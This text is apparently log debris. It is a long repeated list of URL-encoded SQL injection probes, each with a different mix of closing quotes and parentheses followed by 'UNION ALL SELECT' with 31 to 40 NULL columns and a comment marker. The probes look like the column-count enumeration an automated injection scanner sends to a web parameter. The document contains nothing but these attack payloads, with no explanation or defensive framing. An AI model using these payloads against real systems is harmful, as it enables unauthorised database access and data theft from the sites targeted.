1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 